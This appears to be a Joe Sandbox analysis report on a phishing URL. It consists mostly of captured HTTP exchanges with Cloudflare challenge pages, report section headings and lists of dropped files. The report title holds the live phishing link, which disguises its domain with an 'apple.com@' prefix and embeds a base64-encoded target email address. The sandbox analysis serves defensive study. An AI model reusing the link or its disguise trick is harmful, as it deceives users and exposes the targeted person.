2025-01-14 16:14:09 UTC	428	OUT	GET /cdn-cgi/challenge-platform/h/b/i/901eeac43f625e71/1736871247206/f37lvsh0JO71dIb HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:09 UTC	200	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:09 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 901eeadadcd243b0-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 16:14:09 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 31 00 00 00 0c 08 02 00 00 00 44 1a c2 38 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR1D8IDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:09 UTC	811	OUT	GET /cdn-cgi/challenge-platform/h/b/pat/901eeac43f625e71/1736871247210/832e6f88d1391a6975fd6cb5fd5347520ecae1ae5764196675434841ba204c32/ZwHl9XpXvybvOls HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:09 UTC	143	IN	HTTP/1.1 401 Unauthorized Date: Tue, 14 Jan 2025 16:14:09 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 1 Connection: close
2025-01-14 16:14:09 UTC	2015	IN	Data Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 67 79 35 76 69 4e 45 35 47 6d 6c 31 5f 57 79 31 5f 56 4e 48 55 67 37 4b 34 61 35 58 5a 42 6c 6d 64 55 4e 49 51 62 6f 67 54 44 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20ggy5viNE5Gml1_Wy1_VNHUg7K4a5XZBlmdUNIQbogTDIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
2025-01-14 16:14:09 UTC	1	IN	Data Raw: 4a Data Ascii: J

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:10 UTC	1171	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/427550357:1736867636:Hrl0drLFPAO-Ioo5MdhbNq5JwydQFL51g-oXKOylUNU/901eeac43f625e71/wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 32090 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded CF-Chl-RetryAttempt: 0 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:10 UTC	16384	OUT	Data Raw: 76 5f 39 30 31 65 65 61 63 34 33 66 36 32 35 65 37 31 3d 49 7a 4a 65 6d 6a 32 30 70 68 7a 79 7a 79 53 7a 32 6c 32 68 52 76 43 30 34 4b 79 6f 6f 30 79 76 65 66 4a 32 4b 79 4f 50 65 6c 70 34 50 79 6c 65 33 6b 6a 74 54 4a 79 49 6a 79 6a 6b 34 62 79 7a 65 6c 7a 79 36 79 6a 37 6b 79 75 65 4c 68 6b 41 59 79 32 30 79 43 65 6c 30 79 43 32 57 63 79 64 76 76 34 68 79 53 70 4a 48 76 37 79 6f 65 79 68 43 79 4d 6b 32 4d 79 43 4a 32 6f 52 6f 6a 68 39 30 79 6e 76 32 62 79 25 32 62 5a 54 76 76 4d 50 79 66 53 76 79 32 4b 4d 49 37 6f 6f 79 79 4b 6f 30 58 30 64 6a 5a 7a 31 30 53 42 4a 47 49 6d 7a 71 65 46 58 32 65 6d 6f 66 4f 65 79 6b 64 42 71 4a 69 6a 6c 66 54 65 79 76 37 6b 4d 32 79 74 24 59 4f 65 4d 5a 4a 7a 6a 70 72 69 79 54 5a 69 50 48 5a 31 47 57 50 31 74 37 70 46 76 Data Ascii: v_901eeac43f625e71=IzJemj20phzyzySz2l2hRvC04Kyoo0yvefJ2KyOPelp4Pyle3kjtTJyIjyjk4byzelzy6yj7kyueLhkAYy20yCel0yC2Wcydvv4hySpJHv7yoeyhCyMk2MyCJ2oRojh90ynv2by%2bZTvvMPyfSvy2KMI7ooyyKo0X0djZz10SBJGImzqeFX2emofOeykdBqJijlfTeyv7kM2yt$YOeMZJzjpriyTZiPHZ1GWP1t7pFv
2025-01-14 16:14:10 UTC	15706	OUT	Data Raw: 79 4e 79 4f 76 59 4b 43 42 34 71 7a 78 6b 4f 65 34 63 65 37 6c 33 6a 74 32 79 7a 59 79 45 2d 79 6a 79 4a 65 33 4a 6a 47 4a 55 79 79 70 79 50 79 31 65 32 37 6a 31 79 71 65 45 70 32 76 79 63 7a 66 79 79 4e 79 49 65 45 6b 32 76 79 54 65 32 75 47 76 4b 69 37 6a 61 7a 41 2b 6b 54 46 6c 59 4e 79 38 48 4a 44 34 6b 32 36 34 59 66 32 6e 37 49 79 4c 5a 32 31 4e 64 6c 4a 76 6c 54 65 4e 65 66 4a 79 71 79 43 4b 79 37 32 73 65 4a 79 6a 24 7a 4a 71 6f 4e 4d 79 66 76 79 42 62 50 75 51 57 53 24 43 55 78 6a 53 2b 4e 37 4d 62 54 53 50 76 5a 6d 47 65 74 6b 2b 6b 59 4f 41 59 4e 42 76 49 6b 32 52 79 57 79 68 2b 32 4b 32 77 46 72 59 32 44 74 64 79 43 4d 47 53 32 48 6b 75 6c 32 47 2b 68 65 66 4a 6a 6b 79 53 48 79 7a 34 77 53 79 48 59 72 6a 30 37 51 64 63 4a 6d 24 70 75 32 79 42 Data Ascii: yNyOvYKCB4qzxkOe4ce7l3jt2yzYyE-yjyJe3JjGJUyypyPy1e27j1yqeEp2vyczfyyNyIeEk2vyTe2uGvKi7jazA+kTFlYNy8HJD4k264Yf2n7IyLZ21NdlJvlTeNefJyqyCKy72seJyj$zJqoNMyfvyBbPuQWS$CUxjS+N7MbTSPvZmGetk+kYOAYNBvIk2RyWyh+2K2wFrY2DtdyCMGS2Hkul2G+hefJjkySHyz4wSyHYrj07QdcJm$pu2yB
2025-01-14 16:14:10 UTC	322	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:10 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 26376 Connection: close cf-chl-gen: GSZhDMNg9nA023oMjaDYzxKaek20LminSuImAFC9wxSO6/UI9ZE/3CGf6f6nek3d$gUpJ1b3bkUsN8oZs7+Tqhw== Server: cloudflare CF-RAY: 901eeae26e004237-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 16:14:10 UTC	1047	IN	Data Raw: 73 6f 39 33 64 4a 47 38 66 71 47 36 77 4a 4f 6e 78 4b 57 38 6d 38 37 4d 69 4a 4b 7a 73 72 57 57 74 37 62 59 32 4c 4b 36 6c 62 71 39 74 36 75 2b 73 4f 47 33 31 64 65 34 75 71 6a 59 34 63 6d 32 32 61 62 52 34 4f 66 46 72 73 2f 75 74 4b 76 5a 38 50 54 72 37 50 6e 78 34 74 32 38 77 67 4b 34 42 51 6e 34 2b 4e 2f 31 39 75 72 72 42 4d 6e 79 2b 38 62 64 7a 42 4d 55 37 75 7a 34 30 2b 62 34 47 50 62 70 31 42 38 67 39 65 59 4a 47 67 73 4b 42 53 55 58 48 51 63 61 47 78 38 55 45 69 45 74 45 67 59 31 4b 42 6e 30 39 54 51 6f 46 77 6f 43 50 30 41 62 47 69 51 38 46 7a 68 46 48 79 30 4c 4a 79 77 50 50 43 67 52 54 43 59 59 55 68 51 6d 47 46 31 62 56 6b 78 62 50 7a 56 45 59 56 74 5a 49 31 55 6f 61 43 68 41 62 32 55 73 4d 53 70 6c 55 43 35 49 62 32 74 33 4d 45 5a 48 50 56 52 Data Ascii: so93dJG8fqG6wJOnxKW8m87MiJKzsrWWt7bY2LK6lbq9t6u+sOG31de4uqjY4cm22abR4OfFrs/utKvZ8PTr7Pnx4t28wgK4BQn4+N/19urrBMny+8bdzBMU7uz40+b4GPbp1B8g9eYJGgsKBSUXHQcaGx8UEiEtEgY1KBn09TQoFwoCP0AbGiQ8FzhFHy0LJywPPCgRTCYYUhQmGF1bVkxbPzVEYVtZI1UoaChAb2UsMSplUC5Ib2t3MEZHPVR
2025-01-14 16:14:10 UTC	1369	IN	Data Raw: 43 72 4c 2b 69 31 38 47 6a 72 62 7a 53 6d 38 69 39 71 63 7a 42 33 65 4f 77 6f 39 58 68 30 39 4c 68 7a 61 53 34 78 61 7a 6a 71 75 43 76 77 65 61 76 74 4d 58 37 78 73 6e 7a 33 50 37 62 76 4f 2f 75 38 66 41 46 32 74 44 42 43 4e 54 33 32 38 6b 4a 44 51 76 64 43 2b 76 68 34 64 66 70 41 74 59 63 37 74 62 30 45 39 62 31 33 75 50 37 42 76 6b 41 48 2f 6b 57 48 78 6b 67 36 41 49 46 42 4f 38 6a 4e 52 45 51 4e 52 4c 34 41 79 59 74 2b 79 6f 4c 4d 51 49 32 2b 2f 77 4f 51 52 4d 6f 4a 7a 30 32 4a 6b 51 61 43 41 4d 50 48 51 78 56 43 43 74 58 46 46 6b 7a 45 79 63 74 50 6a 6c 54 54 30 73 67 58 56 74 63 4b 45 41 69 50 30 64 6a 4f 57 35 6a 50 6d 39 4d 56 54 35 71 59 54 46 46 53 54 6c 35 4e 6c 56 78 65 46 4e 67 63 47 78 4e 5a 48 38 2b 64 47 4f 48 68 59 46 2f 68 49 46 6d 68 32 Data Ascii: CrL+i18GjrbzSm8i9qczB3eOwo9Xh09LhzaS4xazjquCvweavtMX7xsnz3P7bvO/u8fAF2tDBCNT328kJDQvdC+vh4dfpAtYc7tb0E9b13uP7BvkAH/kWHxkg6AIFBO8jNREQNRL4AyYt+yoLMQI2+/wOQRMoJz02JkQaCAMPHQxVCCtXFFkzEyctPjlTT0sgXVtcKEAiP0djOW5jPm9MVT5qYTFFSTl5NlVxeFNgcGxNZH8+dGOHhYF/hIFmh2
2025-01-14 16:14:10 UTC	1369	IN	Data Raw: 6a 4d 6d 37 6d 74 75 2b 31 74 79 75 6d 64 6e 56 6e 4f 50 6c 70 61 4b 68 71 74 62 4e 71 63 4c 42 33 65 6e 46 72 36 6a 6d 73 64 6a 73 38 76 7a 6d 39 73 37 4f 36 64 7a 35 37 73 36 2b 39 39 37 43 36 64 33 69 35 2b 77 46 7a 51 33 39 2f 75 62 56 44 74 4d 46 35 66 6e 4e 35 77 62 70 41 4e 6e 70 39 75 44 75 34 2f 73 62 43 42 66 6c 46 77 7a 6a 44 75 73 47 48 2f 6f 70 49 76 49 46 49 44 55 32 4c 67 63 52 44 54 38 2b 43 69 6f 79 51 6a 74 43 50 68 6f 31 4f 6b 4d 48 48 7a 30 6e 41 6a 74 4c 44 55 6c 4f 4a 54 46 4d 4e 46 55 57 53 44 68 48 47 68 49 30 4c 42 34 38 4f 6c 74 66 49 47 6f 6e 61 69 4e 6b 61 79 77 77 4c 31 34 75 58 7a 42 42 57 44 56 30 57 32 64 39 61 48 70 70 4f 33 67 34 64 45 46 68 68 6f 5a 35 68 6e 39 66 64 34 5a 33 62 57 56 71 62 59 70 4f 55 48 35 67 6c 59 46 Data Ascii: jMm7mtu+1tyumdnVnOPlpaKhqtbNqcLB3enFr6jmsdjs8vzm9s7O6dz57s6+997C6d3i5+wFzQ39/ubVDtMF5fnN5wbpANnp9uDu4/sbCBflFwzjDusGH/opIvIFIDU2LgcRDT8+CioyQjtCPho1OkMHHz0nAjtLDUlOJTFMNFUWSDhHGhI0LB48OltfIGonaiNkaywwL14uXzBBWDV0W2d9aHppO3g4dEFhhoZ5hn9fd4Z3bWVqbYpOUH5glYF
2025-01-14 16:14:10 UTC	1369	IN	Data Raw: 4f 43 30 76 75 58 54 32 36 61 6f 34 62 7a 73 37 64 6e 59 72 36 79 2f 36 4c 4b 30 30 37 36 77 37 4c 4c 34 75 50 6e 47 33 62 6a 4c 37 66 6a 37 77 50 69 38 33 41 4c 6a 32 50 33 39 36 65 38 43 34 2b 6b 53 30 74 4c 69 45 2b 73 59 38 66 67 58 42 64 50 34 36 67 7a 72 2b 53 55 66 31 2f 72 65 46 2b 4d 49 39 50 54 39 48 50 30 64 2f 69 76 75 37 7a 50 30 49 44 6f 33 4f 42 58 36 45 41 38 50 47 69 34 64 45 55 4d 43 47 42 45 46 46 53 41 2b 52 44 34 6c 44 6c 45 4a 50 45 49 30 55 30 6c 4b 51 54 67 52 4d 56 78 57 54 78 63 72 58 44 73 76 56 57 64 68 51 31 6b 39 4f 32 5a 41 61 45 34 2f 55 6b 34 75 59 6a 42 6f 61 30 4d 32 52 6a 74 6e 4f 55 70 2f 66 7a 39 4f 58 6c 64 53 66 47 57 48 5a 45 56 34 64 33 70 35 6a 57 4e 5a 53 6c 46 66 66 34 71 46 6c 5a 53 54 6e 49 74 79 61 6c 75 63 Data Ascii: OC0vuXT26ao4bzs7dnYr6y/6LK0076w7LL4uPnG3bjL7fj7wPi83ALj2P396e8C4+kS0tLiE+sY8fgXBdP46gzr+SUf1/reF+MI9PT9HP0d/ivu7zP0IDo3OBX6EA8PGi4dEUMCGBEFFSA+RD4lDlEJPEI0U0lKQTgRMVxWTxcrXDsvVWdhQ1k9O2ZAaE4/Uk4uYjBoa0M2RjtnOUp/fz9OXldSfGWHZEV4d3p5jWNZSlFff4qFlZSTnItyaluc
2025-01-14 16:14:10 UTC	1369	IN	Data Raw: 4c 54 32 64 53 6b 6e 73 65 70 70 2b 61 76 38 62 2f 6e 77 71 6a 54 74 4d 2f 55 75 63 2f 65 35 73 7a 56 39 64 37 32 39 2f 6e 6b 76 2f 50 78 35 2b 6a 6a 33 4d 6b 45 43 67 2f 65 45 4f 58 39 37 41 48 71 47 52 76 31 45 78 34 61 45 50 63 55 47 51 58 75 33 42 51 64 35 69 4d 48 48 51 51 43 42 78 6b 50 41 7a 41 75 49 53 6a 78 43 66 45 55 2b 43 38 7a 2b 7a 34 4d 4e 41 76 30 49 42 6f 63 48 77 59 61 4a 67 49 45 49 6a 38 6f 48 53 6f 77 4d 42 38 32 49 44 38 6a 4e 6b 63 34 45 79 6f 39 52 79 30 67 48 45 41 79 4a 55 46 41 4e 45 70 46 56 43 52 4a 4b 6b 78 78 53 53 35 55 54 7a 41 7a 54 46 4e 77 57 31 52 48 66 47 39 54 4f 55 6d 43 59 47 46 53 58 32 56 37 53 59 64 6a 61 6d 5a 58 65 4a 46 6d 63 32 6c 78 5a 6f 42 74 6a 47 35 6b 65 34 31 2b 69 6e 2b 52 6d 4a 4a 39 62 32 52 67 68 Data Ascii: LT2dSknsepp+av8b/nwqjTtM/Uuc/e5szV9d729/nkv/Px5+jj3MkECg/eEOX97AHqGRv1Ex4aEPcUGQXu3BQd5iMHHQQCBxkPAzAuISjxCfEU+C8z+z4MNAv0IBocHwYaJgIEIj8oHSowMB82ID8jNkc4Eyo9Ry0gHEAyJUFANEpFVCRJKkxxSS5UTzAzTFNwW1RHfG9TOUmCYGFSX2V7SYdjamZXeJFmc2lxZoBtjG5ke41+in+RmJJ9b2Rgh
2025-01-14 16:14:10 UTC	1369	IN	Data Raw: 34 32 4e 32 2b 38 37 4b 79 78 66 54 6c 36 63 4c 45 39 4e 76 49 30 64 66 2b 31 38 4b 35 31 38 45 42 42 66 37 66 79 66 6a 67 2b 4d 44 6d 7a 2b 66 68 41 65 50 55 79 4e 55 48 36 52 62 61 42 64 67 67 33 74 37 79 49 75 73 56 34 69 4d 69 35 67 49 73 41 42 37 33 2b 41 54 38 42 43 34 65 43 54 45 43 41 50 62 7a 2b 54 6b 78 50 76 41 75 2f 6b 45 43 51 2f 34 42 2f 45 59 45 4e 51 6f 35 54 67 78 4c 4a 41 63 68 56 45 30 6f 4a 69 41 67 53 69 52 5a 56 6c 55 59 58 6c 6c 50 4e 46 35 4f 4f 57 45 79 4d 43 63 6b 4b 6d 6c 68 62 69 46 65 4c 33 45 79 63 79 38 78 4c 58 59 30 5a 54 70 70 66 6a 78 37 53 48 4a 4d 67 58 34 37 58 49 47 43 69 6d 46 55 59 45 74 6b 6b 47 4e 39 53 56 32 4e 64 47 46 71 63 4a 64 77 57 31 4a 77 57 70 6d 64 6c 33 68 69 6b 58 6d 52 57 58 39 6f 67 48 71 5a 66 47 Data Ascii: 42N2+87KyxfTl6cLE9NvI0df+18K518EBBf7fyfjg+MDmz+fhAePUyNUH6RbaBdgg3t7yIusV4iMi5gIsAB73+AT8BC4eCTECAPbz+TkxPvAu/kECQ/4B/EYENQo5TgxLJAchVE0oJiAgSiRZVlUYXllPNF5OOWEyMCckKmlhbiFeL3Eycy8xLXY0ZTppfjx7SHJMgX47XIGCimFUYEtkkGN9SV2NdGFqcJdwW1JwWpmdl3hikXmRWX9ogHqZfG
2025-01-14 16:14:10 UTC	1369	IN	Data Raw: 78 50 62 78 72 73 6e 37 39 62 72 4d 41 4c 33 62 32 41 50 39 38 64 67 49 78 76 6e 65 43 2f 62 58 35 51 72 6a 78 75 41 54 35 77 37 6e 46 78 4c 4f 38 52 76 61 7a 74 51 67 47 74 62 79 49 77 2f 76 2b 79 63 69 34 76 7a 68 2f 67 67 45 4d 41 51 75 42 44 4c 79 4d 67 6a 74 44 50 49 4c 4e 68 44 36 44 30 41 72 44 42 5a 44 47 45 49 56 53 45 4c 36 41 55 78 47 50 69 51 47 4a 41 73 71 56 45 35 57 4c 56 67 57 4e 43 39 63 56 6c 6f 74 58 30 6f 62 4f 6d 4d 35 4d 44 35 69 50 43 4d 2f 62 45 42 71 50 32 39 71 63 6b 4e 7a 58 69 63 74 65 47 4a 32 55 58 74 33 53 46 42 2f 50 33 4a 5a 67 32 31 67 57 34 65 44 56 47 4b 4d 64 6f 70 6b 6a 32 56 63 5a 6f 35 6f 6c 6d 36 57 56 35 70 74 6d 34 5a 54 62 56 5a 30 6a 56 6d 6b 6e 70 70 35 71 48 78 6e 66 36 79 57 72 6f 4b 71 68 4c 4b 48 61 6f 68 Data Ascii: xPbxrsn79brMAL3b2AP98dgIxvneC/bX5QrjxuAT5w7nFxLO8RvaztQgGtbyIw/v+yci4vzh/ggEMAQuBDLyMgjtDPILNhD6D0ArDBZDGEIVSEL6AUxGPiQGJAsqVE5WLVgWNC9cVlotX0obOmM5MD5iPCM/bEBqP29qckNzXicteGJ2UXt3SFB/P3JZg21gW4eDVGKMdopkj2VcZo5olm6WV5ptm4ZTbVZ0jVmknpp5qHxnf6yWroKqhLKHaoh
2025-01-14 16:14:10 UTC	1369	IN	Data Raw: 64 54 61 2b 75 37 59 38 63 37 42 2b 73 2f 54 38 50 54 41 32 66 76 6f 39 64 37 4e 2f 4d 6a 68 33 66 44 39 35 74 55 46 30 4f 59 57 38 50 34 61 36 50 50 73 37 51 30 54 41 43 4c 37 35 65 50 36 47 75 58 6f 2b 69 6b 4d 43 54 51 64 48 79 59 43 49 53 63 55 4e 68 44 36 46 44 72 39 47 55 42 42 51 67 49 42 45 30 45 68 4b 6b 63 37 4e 7a 35 4c 47 55 45 50 49 53 34 6c 4e 56 4e 48 54 52 52 57 47 6a 55 34 58 56 38 33 47 53 38 6a 4f 55 4a 69 4d 55 51 31 4f 46 56 46 53 32 31 75 4c 69 31 41 62 55 31 50 63 6a 5a 52 57 48 6c 37 61 54 56 4d 50 31 56 69 66 6b 31 32 55 56 56 78 59 57 75 4a 69 6b 70 4a 57 33 6c 70 6b 49 36 53 61 59 46 6f 67 32 47 4c 6d 5a 70 61 57 57 32 4a 65 59 31 30 6a 32 32 58 6f 6d 61 42 6c 58 79 57 62 4a 2b 74 72 6d 35 74 67 59 65 4e 6f 59 69 69 65 4b 75 32 Data Ascii: dTa+u7Y8c7B+s/T8PTA2fvo9d7N/Mjh3fD95tUF0OYW8P4a6PPs7Q0TACL75eP6GuXo+ikMCTQdHyYCIScUNhD6FDr9GUBBQgIBE0EhKkc7Nz5LGUEPIS4lNVNHTRRWGjU4XV83GS8jOUJiMUQ1OFVFS21uLi1AbU1PcjZRWHl7aTVMP1Vifk12UVVxYWuJikpJW3lpkI6SaYFog2GLmZpaWW2JeY10j22XomaBlXyWbJ+trm5tgYeNoYiieKu2

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:11 UTC	598	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/427550357:1736867636:Hrl0drLFPAO-Ioo5MdhbNq5JwydQFL51g-oXKOylUNU/901eeac43f625e71/wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:11 UTC	442	IN	HTTP/1.1 400 Bad Request Date: Tue, 14 Jan 2025 16:14:11 GMT Content-Type: application/json Content-Length: 14 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: 9w4GQnOfe8RsunptPwzQHcHbQWmVR1dIVPzuQRpdkPj3aRrmC5Mh86akSv2d2wPootCVRZyeSCu2M22ei0v1RQ==$3G+V/GOltuaq2iSKdoYD2Q== Server: cloudflare CF-RAY: 901eeae7aeba4233-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 16:14:11 UTC	14	IN	Data Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d Data Ascii: {"err":100230}

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Cryptography

Phishing

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Windows Analysis Report
https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:18 UTC	1171	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/427550357:1736867636:Hrl0drLFPAO-Ioo5MdhbNq5JwydQFL51g-oXKOylUNU/901eeac43f625e71/wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 34546 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded CF-Chl-RetryAttempt: 0 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:18 UTC	16384	OUT	Data Raw: 76 5f 39 30 31 65 65 61 63 34 33 66 36 32 35 65 37 31 3d 49 7a 4a 65 6d 6a 32 30 70 68 7a 79 7a 79 53 7a 32 6c 32 68 52 76 43 30 34 4b 79 6f 6f 30 79 76 65 66 4a 32 4b 79 4f 50 65 6c 70 34 50 79 6c 65 33 6b 6a 74 54 4a 79 49 6a 79 6a 6b 34 62 79 7a 65 6c 7a 79 36 79 6a 37 6b 79 75 65 4c 68 6b 41 59 79 32 30 79 43 65 6c 30 79 43 32 57 63 79 64 76 76 34 68 79 53 70 4a 48 76 37 79 6f 65 79 68 43 79 4d 6b 32 4d 79 43 4a 32 6f 52 6f 6a 68 39 30 79 6e 76 32 62 79 25 32 62 5a 54 76 76 4d 50 79 66 53 76 79 32 4b 4d 49 37 6f 6f 79 79 4b 6f 30 58 30 64 6a 5a 7a 31 30 53 42 4a 47 49 6d 7a 71 65 46 58 32 65 6d 6f 66 4f 65 79 6b 64 42 71 4a 69 6a 6c 66 54 65 79 76 37 6b 4d 32 79 74 24 59 4f 65 4d 5a 4a 7a 6a 70 72 69 79 54 5a 69 50 48 5a 31 